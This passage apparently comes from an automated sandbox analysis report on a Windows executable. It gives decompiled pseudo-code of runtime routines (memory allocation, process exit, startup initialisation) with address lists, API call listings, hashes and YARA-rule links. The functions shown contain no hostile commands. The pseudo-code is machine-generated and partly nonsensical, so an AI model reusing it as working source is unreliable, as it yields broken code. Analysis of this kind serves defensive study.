									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x22aaaf0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                            0x00403ee8
                                                            0x00403ef4
                                                            0x00403efa
                                                            0x00404148
                                                            0x0040414d
                                                            0x00404260
                                                            0x00404261
                                                            0x00404263
                                                            0x00403c94
                                                            0x00403c98
                                                            0x00403c9a
                                                            0x00403ca4
                                                            0x00403cb4
                                                            0x00403cb9
                                                            0x00403cbd
                                                            0x00403cbf
                                                            0x00403cc1
                                                            0x00403cc7
                                                            0x00403cca
                                                            0x00403ccf
                                                            0x00403cd4
                                                            0x00403cda
                                                            0x00403ce0
                                                            0x00403ce3
                                                            0x00403ce5
                                                            0x00403cec
                                                            0x00403cec
                                                            0x00403cf5
                                                            0x00404269
                                                            0x00404269
                                                            0x0040426b
                                                            0x0040426b
                                                            0x00404153
                                                            0x00404153
                                                            0x0040415f
                                                            0x00404162
                                                            0x00404164
                                                            0x0040410c
                                                            0x00404111
                                                            0x00404119
                                                            0x00000000
                                                            0x00000000
                                                            0x0040411b
                                                            0x0040411d
                                                            0x00404124
                                                            0x00000000
                                                            0x00404126
                                                            0x00404128
                                                            0x00404132
                                                            0x0040413a
                                                            0x0040413e
                                                            0x00000000
                                                            0x0040413e
                                                            0x0040413a
                                                            0x00000000
                                                            0x00404124
                                                            0x0040410c
                                                            0x00404166
                                                            0x00404166
                                                            0x00404166
                                                            0x0040416e
                                                            0x00404171
                                                            0x0040417b
                                                            0x0040417b
                                                            0x00404182
                                                            0x00404195
                                                            0x00404199
                                                            0x0040419f
                                                            0x004041b8
                                                            0x004041be
                                                            0x004041be
                                                            0x004041c0
                                                            0x004041de
                                                            0x004041c2
                                                            0x004041c2
                                                            0x004041c7
                                                            0x004041c9
                                                            0x004041ce
                                                            0x004041d7
                                                            0x004041d7
                                                            0x004041e3
                                                            0x004041eb
                                                            0x004041a1
                                                            0x004041a1
                                                            0x004041ab
                                                            0x004041b3
                                                            0x00000000
                                                            0x004041b3
                                                            0x00404184
                                                            0x00404187
                                                            0x0040418a
                                                            0x004041ec
                                                            0x004041ec
                                                            0x004041ed
                                                            0x004041ee
                                                            0x004041f5
                                                            0x004041f8
                                                            0x004041fb
                                                            0x004041fe
                                                            0x00404200
                                                            0x00404202
                                                            0x00404209
                                                            0x0040420b
                                                            0x0040420b
                                                            0x0040420b
                                                            0x00404212
                                                            0x00404214
                                                            0x00404214
                                                            0x00404212
                                                            0x00404220
                                                            0x00404225
                                                            0x00404225
                                                            0x00404227
                                                            0x00404248
                                                            0x00404248
                                                            0x00404248
                                                            0x00404229
                                                            0x00404229
                                                            0x0040422f
                                                            0x00404232
                                                            0x00404236
                                                            0x0040423c
                                                            0x0040423e
                                                            0x0040423e
                                                            0x0040423c
                                                            0x0040424d
                                                            0x00404250
                                                            0x00404253
                                                            0x0040425f
                                                            0x0040425f
                                                            0x00404182
                                                            0x00403f00
                                                            0x00403f00
                                                            0x00403f02
                                                            0x00403f02
                                                            0x00403f09
                                                            0x00403f10
                                                            0x00403f68
                                                            0x00403f68
                                                            0x00403f6d
                                                            0x00403f71
                                                            0x00000000
                                                            0x00000000
                                                            0x00403f73
                                                            0x00403f73
                                                            0x00403f76
                                                            0x00403f7b
                                                            0x00403f7f
                                                            0x00403f81
                                                            0x00403f81
                                                            0x00403f84
                                                            0x00403f89
                                                            0x00403f8d
                                                            0x00403f8f
                                                            0x00403f92
                                                            0x00403f94
                                                            0x00403f9b
                                                            0x00000000
                                                            0x00403f9d
                                                            0x00403f9f
                                                            0x00403fa4
                                                            0x00403fa9
                                                            0x00403fad
                                                            0x00403fb5
                                                            0x00000000
                                                            0x00403fb5
                                                            0x00403fad
                                                            0x00403f9b
                                                            0x00403f8d
                                                            0x00000000
                                                            0x00403f7f
                                                            0x00403f68
                                                            0x00403f12
                                                            0x00403f12
                                                            0x00403f15
                                                            0x00403f18
                                                            0x00403f1d
                                                            0x00403f1f
                                                            0x00403f38
                                                            0x00403f3b
                                                            0x00403f3f
                                                            0x00403f41
                                                            0x00403f44
                                                            0x00403fbc
                                                            0x00403fbd
                                                            0x00403fbe
                                                            0x00403fc5
                                                            0x00403fc7
                                                            0x00403fc7
                                                            0x00403fcc
                                                            0x00403fd4
                                                            0x00000000
                                                            0x00000000
                                                            0x00403fd6
                                                            0x00403fd8
                                                            0x00403fdf
                                                            0x00000000
                                                            0x00403fe1
                                                            0x00403fe3
                                                            0x00403fe8
                                                            0x00403fed
                                                            0x00403ff5
                                                            0x00403ff9
                                                            0x00000000
                                                            0x00403ff9
                                                            0x00403ff5
                                                            0x00000000
                                                            0x00403fdf
                                                            0x00403fc7
                                                            0x00404000
                                                            0x00404004
                                                            0x00404004
                                                            0x0040400a
                                                            0x0040407c
                                                            0x00404080
                                                            0x00404086
                                                            0x00404088
                                                            0x004040b0
                                                            0x004040b4
                                                            0x004040b6
                                                            0x004040bb
                                                            0x004040bd
                                                            0x004040bf
                                                            0x00000000
                                                            0x004040c1
                                                            0x004040c1
                                                            0x004040c6
                                                            0x004040c8
                                                            0x004040c9
                                                            0x004040ca
                                                            0x004040cb
                                                            0x004040cb
                                                            0x0040408a
                                                            0x0040408a
                                                            0x00404090
                                                            0x00404094
                                                            0x0040409a
                                                            0x0040409c
                                                            0x0040409e
                                                            0x0040409e
                                                            0x004040a0
                                                            0x004040a2
                                                            0x004040a8
                                                            0x00000000
                                                            0x004040a8
                                                            0x0040400c
                                                            0x0040400c
                                                            0x0040400f
                                                            0x00404016
                                                            0x0040401d
                                                            0x00404020
                                                            0x00404023
                                                            0x0040402a
                                                            0x0040402d
                                                            0x00404030
                                                            0x00404033
                                                            0x00404035
                                                            0x00404037
                                                            0x00404039
                                                            0x0040403e
                                                            0x00404040
                                                            0x00404040
                                                            0x00404040
                                                            0x00404047
                                                            0x00404049
                                                            0x00404049
                                                            0x00404047
                                                            0x00404050
                                                            0x00404055
                                                            0x00404058
                                                            0x0040405e
                                                            0x004040cc
                                                            0x004040cc
                                                            0x004040cc
                                                            0x00404060
                                                            0x00404060
                                                            0x00404062
                                                            0x00404066
                                                            0x00404068
                                                            0x0040406b
                                                            0x0040406e
                                                            0x00404071
                                                            0x00404075
                                                            0x00404075
                                                            0x004040d1
                                                            0x004040d1
                                                            0x004040d1
                                                            0x004040d4
                                                            0x004040d7
                                                            0x004040d9
                                                            0x004040de
                                                            0x004040e0
                                                            0x004040e3
                                                            0x004040ea
                                                            0x004040ed
                                                            0x004040ed
                                                            0x004040f0
                                                            0x004040f4
                                                            0x004040f7
                                                            0x004040fa
                                                            0x004040fc
                                                            0x004040fc
                                                            0x004040fe
                                                            0x00404101
                                                            0x00404104
                                                            0x00404107
                                                            0x00404108
                                                            0x00404109
                                                            0x0040410a
                                                            0x0040410a
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f4a
                                                            0x00403f4d
                                                            0x00403f50
                                                            0x00403f53
                                                            0x00403f54
                                                            0x00403f54
                                                            0x00403f21
                                                            0x00403f21
                                                            0x00403f25
                                                            0x00403f25
                                                            0x00403f28
                                                            0x00403f2b
                                                            0x00403f2e
                                                            0x00403f58
                                                            0x00403f5b
                                                            0x00403f5e
                                                            0x00403f61
                                                            0x00403f64
                                                            0x00403f65
                                                            0x00403f30
                                                            0x00403f30
                                                            0x00403f33
                                                            0x00403f34
                                                            0x00403f34
                                                            0x00403f2e
                                                            0x00403f1f

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                            • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                            0x00407764
                                                            0x00407766
                                                            0x0040776b
                                                            0x00407772
                                                            0x00407772
                                                            0x0040777e
                                                            0x00407792
                                                            0x0040779c
                                                            0x0040779c
                                                            0x004077a5
                                                            0x004077c9
                                                            0x004077cd
                                                            0x004077d6
                                                            0x004077d6
                                                            0x004077dd
                                                            0x004077fc
                                                            0x004077fc
                                                            0x00407805
                                                            0x0040780c
                                                            0x00407811
                                                            0x00407813
                                                            0x00407818
                                                            0x0040781b
                                                            0x0040781b
                                                            0x0040781e
                                                            0x00407821
                                                            0x00407828
                                                            0x00407828
                                                            0x00407821
                                                            0x00407811
                                                            0x0040782f
                                                            0x00407838
                                                            0x0040783a
                                                            0x0040783a
                                                            0x00407841
                                                            0x00407845
                                                            0x00407845
                                                            0x0040784d
                                                            0x00407856
                                                            0x00407858
                                                            0x00407858
                                                            0x00407861
                                                            0x00407861
                                                            0x00407873
                                                            0x00407873
                                                            0x00407875
                                                            0x00407876
                                                            0x00000000
                                                            0x004077df
                                                            0x004077df
                                                            0x004077e4
                                                            0x004077e8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077ea
                                                            0x004077ec
                                                            0x004077f1
                                                            0x004077f6
                                                            0x004077f8
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b9
                                                            0x004077be
                                                            0x004077c0
                                                            0x00000000
                                                            0x004077c9
                                                            0x00000000
                                                            0x004077c9

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                            • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                            0x0040774a
                                                            0x00407764
                                                            0x00407766
                                                            0x0040776b
                                                            0x00407772
                                                            0x00407772
                                                            0x0040777e
                                                            0x00407792
                                                            0x0040779c
                                                            0x0040779c
                                                            0x004077a5
                                                            0x004077c9
                                                            0x004077cd
                                                            0x004077d6
                                                            0x004077d6
                                                            0x004077dd
                                                            0x004077fc
                                                            0x004077fc
                                                            0x00407805
                                                            0x0040780c
                                                            0x00407811
                                                            0x00407813
                                                            0x00407818
                                                            0x0040781b
                                                            0x0040781b
                                                            0x0040781e
                                                            0x00407821
                                                            0x00407828
                                                            0x00407828
                                                            0x00407821
                                                            0x00407811
                                                            0x0040782f
                                                            0x00407838
                                                            0x0040783a
                                                            0x0040783a
                                                            0x00407841
                                                            0x00407845
                                                            0x00407845
                                                            0x0040784d
                                                            0x00407856
                                                            0x00407858
                                                            0x00407858
                                                            0x00407861
                                                            0x00407861
                                                            0x00407873
                                                            0x00407873
                                                            0x00407875
                                                            0x00407876
                                                            0x00000000
                                                            0x004077df
                                                            0x004077df
                                                            0x004077e4
                                                            0x004077e8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077ea
                                                            0x004077ec
                                                            0x004077f1
                                                            0x004077f6
                                                            0x004077f8
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b9
                                                            0x004077be
                                                            0x004077c0
                                                            0x00000000
                                                            0x004077c9
                                                            0x00000000
                                                            0x004077c9

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                            • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                            0x004b5005
                                                            0x004b5006
                                                            0x004b500b
                                                            0x004b500e
                                                            0x004b5011
                                                            0x004b5018
                                                            0x004b501e
                                                            0x004b5023
                                                            0x004b502d
                                                            0x004b5032
                                                            0x004b5037
                                                            0x004b503e
                                                            0x004b5048
                                                            0x004b5052
                                                            0x004b505e
                                                            0x004b5063
                                                            0x004b5072
                                                            0x004b5077
                                                            0x004b5080
                                                            0x004b5089
                                                            0x004b5097
                                                            0x004b50a1
                                                            0x004b50ab
                                                            0x004b50b0
                                                            0x004b50bf
                                                            0x004b50c4
                                                            0x004b50c4
                                                            0x004b50cb
                                                            0x004b50ce
                                                            0x004b50d1
                                                            0x004b50d6

                                                            APIs
                                                            • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                              • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                              • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                              • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                            • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                              • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                            • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                            • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                              • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                            • String ID:
                                                            • API String ID: 2740004594-0
                                                            • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                            • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
